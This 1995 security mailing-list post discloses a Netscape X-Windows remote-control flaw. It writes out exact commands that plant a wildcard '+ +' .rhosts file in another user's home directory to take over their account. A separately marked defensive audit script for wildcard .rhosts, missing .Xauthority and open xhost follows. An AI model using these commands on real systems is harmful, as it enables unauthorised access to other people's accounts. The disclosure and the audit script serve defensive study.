List:       best-of-security
Subject:    BoS: netscape/X remote control exploit
From:       Julian Assange <proff () suburbia ! net>
Date:       1995-10-01 6:31:19

SOURCE: comp.security.unix
RE: Netscape remote control mechanism for X based clients.

* There's a huge hole in the Netscape remote control mechanism for the
* X-Windows based clients.
* Potential impact : anybody can become any user that uses Netscape on any
* system without sufficient X security.

* Let's suppose that you have an account on a target machine, where somebody
* is using Netscape, and either the xhost checking is disabled, or you can
* set the xhost yourself (e.g. if you have an account and the target user has
* no .Xauthority, as is frequent in university computer rooms).
* Then you can gain access to the target user's account using the following
* steps :

* - make a text file containing only "+ +" accessible (as file, as URL, or
*   whatever you like) to the target Netscape client. This is quite easy, either
*   if you have a personal WWW page (http://... URL) or an account on the
*   target machine (file://... URL), or even by uploading it to an anon FTP

* - set your DISPLAY environment variable to the target display

* - run the following set of commands :

*   netscape -noraise -remote "openURL(<put-your-URL-here>)"
*   netscape -noraise -remote "saveAs(.rhosts)"
*   netscape -noraise -remote back

* In the second command, the path should be specified whenever possible
* (~ is not accepted).

* If the target user does not already have a .rhosts and is not looking at that
* precise moment, then the chances are it worked !
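
The two conditions the post depends on, disabled xhost access control and a `.rhosts` that trusts everyone, can be checked from the defender's side. The script below is an added example, not part of the original post; its function names and finding labels are illustrative assumptions, and the xhost status text it matches is the line printed by the standard `xhost` client.

```sh
#!/bin/sh
# Added example (not from the original post). Function names and the
# finding labels (WILDCARD_RHOSTS, NO_XAUTHORITY, XHOST_OPEN) are illustrative.

# Succeeds if the .rhosts file at $1 trusts every host or every user:
# a bare "+" in either field, as in the "+ +" file the post describes.
# Netgroup entries such as "+@group" are not bare wildcards and do not match.
rhosts_is_wildcard() {
    [ -f "$1" ] || return 1
    awk '/^[ \t]*#/ { next }
         $1 == "+" || $2 == "+" { found = 1 }
         END { exit(found ? 0 : 1) }' "$1"
}

# Reads `xhost` output on stdin; succeeds if access control is switched off.
xhost_is_open() {
    grep -q 'access control disabled'
}

# Prints one finding per line for the home directory $1.
audit_home() {
    if rhosts_is_wildcard "$1/.rhosts"; then
        echo "WILDCARD_RHOSTS $1/.rhosts"
    fi
    # Missing or empty ~/.Xauthority is the condition the post names
    # (cookies may live elsewhere if XAUTHORITY points to another file).
    if [ ! -s "$1/.Xauthority" ]; then
        echo "NO_XAUTHORITY $1"
    fi
    return 0
}

# Usage: sh audit.sh /home/*
# Also reports the current display when DISPLAY is set and xhost is available.
if [ "$#" -gt 0 ]; then
    for home in "$@"; do audit_home "$home"; done
    if [ -n "${DISPLAY:-}" ] && xhost 2>/dev/null | xhost_is_open; then
        echo "XHOST_OPEN $DISPLAY"
    fi
fi
```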
